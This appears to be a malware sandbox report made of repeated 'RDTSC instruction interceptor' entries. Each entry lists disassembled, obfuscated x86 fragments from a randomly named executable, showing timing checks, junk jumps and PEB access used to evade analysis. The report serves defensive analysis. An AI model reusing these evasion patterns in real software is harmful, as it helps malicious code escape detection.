                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1B14 second address: 46B1B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1B1A second address: 46B1B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4680191 second address: 4680195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4680195 second address: 46801B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46801B1 second address: 46801B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46801B7 second address: 46801BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46801BB second address: 46801F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC218F099BCh 0x00000013 adc eax, 03A8C868h 0x00000019 jmp 00007FC218F099BBh 0x0000001e popfd 0x0000001f mov ebx, esi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ebx, esi 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690A22 second address: 4690A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC2192E858Ch 0x00000008 pop ecx 0x00000009 mov dh, 6Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FC2192E858Ah 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC2192E858Eh 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690A53 second address: 4690A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC218F099C6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop esi 0x00000016 mov dh, 2Bh 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690A83 second address: 4690A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46402A2 second address: 46402A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46402A6 second address: 46402C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46402C2 second address: 464032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC218F099C1h 0x00000009 sub esi, 6C68E766h 0x0000000f jmp 00007FC218F099C1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC218F099C0h 0x0000001b adc eax, 057B0F08h 0x00000021 jmp 00007FC218F099BBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC218F099C5h 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 464032D second address: 4640346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, C7B9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC2192E858Bh 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4640346 second address: 464034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 464034C second address: 4640388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b jmp 00007FC2192E8597h 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC2192E8595h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690E36 second address: 4690E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC218F099C0h 0x00000009 sbb cx, 8718h 0x0000000e jmp 00007FC218F099BBh 0x00000013 popfd 0x00000014 jmp 00007FC218F099C8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690E7D second address: 4690E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690E81 second address: 4690E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690E87 second address: 4690ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC2192E8592h 0x00000009 or ax, 0BD8h 0x0000000e jmp 00007FC2192E858Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov eax, edi 0x0000001d movsx edi, ax 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC2192E8595h 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690ED3 second address: 4690EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC218F099BDh 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690D9D second address: 4690DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E858Ch 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690DAD second address: 4690DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690DB1 second address: 4690DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FC2192E858Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC2192E8597h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 4690DE2 second address: 4690A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC218F099BEh 0x00000010 pop ebp 0x00000011 jmp 00007FC218F099C0h 0x00000016 jmp dword ptr [76FF155Ch] 0x0000001c mov edi, edi 0x0000001e push ebp 0x0000001f mov ebp, esp 0x00000021 mov ecx, dword ptr fs:[00000018h] 0x00000028 mov eax, dword ptr [ebp+08h] 0x0000002b mov dword ptr [ecx+34h], 00000000h 0x00000032 cmp eax, 40h 0x00000035 jnc 00007FC218F099BDh 0x00000037 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000003e pop ebp 0x0000003f retn 0004h 0x00000042 test eax, eax 0x00000044 je 00007FC218F099D3h 0x00000046 mov eax, dword ptr [004227D0h] 0x0000004b cmp eax, FFFFFFFFh 0x0000004e je 00007FC218F099C9h 0x00000050 mov esi, 0041F69Ch 0x00000055 push esi 0x00000056 call 00007FC21D189F1Bh 0x0000005b mov edi, edi 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov di, AEF8h 0x00000064 popad 0x00000065 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A0128 second address: 46A012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A012E second address: 46A0132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A0132 second address: 46A01AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007FC2192E8594h 0x0000000f movzx esi, di 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FC2192E8598h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov cx, 14FDh 0x00000020 call 00007FC2192E858Ah 0x00000025 call 00007FC2192E8592h 0x0000002a pop ecx 0x0000002b pop edx 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f jmp 00007FC2192E858Eh 0x00000034 mov ecx, dword ptr [ebp+08h] 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a movzx eax, di 0x0000003d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A01AC second address: 46A01C1 instructions: 0x00000000 rdtsc 0x00000002 mov di, 0B7Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dl, 63h 0x0000000a popad 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A01C1 second address: 46A01D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E858Ch 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A01D1 second address: 46A01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A01D5 second address: 46A0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushfd 0x0000000c jmp 00007FC2192E8598h 0x00000011 xor ax, B828h 0x00000016 jmp 00007FC2192E858Bh 0x0000001b popfd 0x0000001c pop esi 0x0000001d mov bx, 846Ch 0x00000021 popad 0x00000022 lock xadd dword ptr [ecx], eax 0x00000026 jmp 00007FC2192E858Bh 0x0000002b inc eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov al, dl 0x00000031 pushfd 0x00000032 jmp 00007FC2192E858Ch 0x00000037 or ah, FFFFFFB8h 0x0000003a jmp 00007FC2192E858Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A0242 second address: 46A0248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A0248 second address: 46A024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46A024C second address: 46A0250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B002C second address: 46B0061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FC2192E8590h 0x0000000c adc si, 9C98h 0x00000011 jmp 00007FC2192E858Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov di, ax 0x00000021 mov bl, cl 0x00000023 popad 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0061 second address: 46B0084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0084 second address: 46B008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B008A second address: 46B0090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0090 second address: 46B0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FC2192E8590h 0x00000012 mov eax, dword ptr fs:[00000030h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC2192E858Dh 0x0000001f or ah, FFFFFFA6h 0x00000022 jmp 00007FC2192E8591h 0x00000027 popfd 0x00000028 popad 0x00000029 sub esp, 18h 0x0000002c jmp 00007FC2192E858Eh 0x00000031 xchg eax, ebx 0x00000032 jmp 00007FC2192E8590h 0x00000037 push eax 0x00000038 jmp 00007FC2192E858Bh 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 movsx edi, si 0x00000044 mov ebx, eax 0x00000046 popad 0x00000047 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0119 second address: 46B0196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007FC218F099BEh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FC218F099C0h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov dx, 5714h 0x0000001d pushad 0x0000001e mov esi, 1C674575h 0x00000023 popad 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 jmp 00007FC218F099C0h 0x0000002b mov esi, dword ptr [770206ECh] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FC218F099C7h 0x00000038 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0196 second address: 46B019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B019D second address: 46B01AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, ah 0x0000000e mov al, bl 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B01AE second address: 46B01BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E858Ah 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B01BC second address: 46B01C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B01C0 second address: 46B01EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC2192E958Ah 0x0000000e jmp 00007FC2192E8597h 0x00000013 xchg eax, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B01EC second address: 46B01F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B01F0 second address: 46B020B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B020B second address: 46B0223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0223 second address: 46B0260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC2192E8592h 0x00000013 sbb ch, FFFFFFD8h 0x00000016 jmp 00007FC2192E858Bh 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0260 second address: 46B0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0264 second address: 46B026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B026A second address: 46B02B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC218F099C8h 0x00000009 and ecx, 3C15AF68h 0x0000000f jmp 00007FC218F099BBh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a call dword ptr [76FF0B60h] 0x00000020 mov eax, 7571E5E0h 0x00000025 ret 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC218F099C1h 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B02B6 second address: 46B02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B02BC second address: 46B0318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d jmp 00007FC218F099C6h 0x00000012 pop edi 0x00000013 jmp 00007FC218F099C0h 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC218F099C7h 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0318 second address: 46B0330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2192E8594h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0330 second address: 46B0358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC218F099C4h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0358 second address: 46B03B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC2192E8591h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d jmp 00007FC2192E858Ah 0x00000012 push dword ptr [eax] 0x00000014 jmp 00007FC2192E8590h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f jmp 00007FC2192E8590h 0x00000024 push dword ptr [eax+18h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007FC2192E858Dh 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B040B second address: 46B0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0423 second address: 46B0427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0427 second address: 46B0454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC218F099C7h 0x0000000f je 00007FC28B7F8C16h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0454 second address: 46B046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B046F second address: 46B0475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0475 second address: 46B049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC2192E8596h 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B049C second address: 46B04A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B04A0 second address: 46B04A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B04A6 second address: 46B04D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC218F099BCh 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi], edi 0x00000011 jmp 00007FC218F099BAh 0x00000016 mov dword ptr [esi+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC218F099BAh 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B04D9 second address: 46B04DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B04DD second address: 46B04E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B04E3 second address: 46B04E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B04E9 second address: 46B0523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC218F099C7h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0523 second address: 46B0549 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0549 second address: 46B054D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B054D second address: 46B0560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
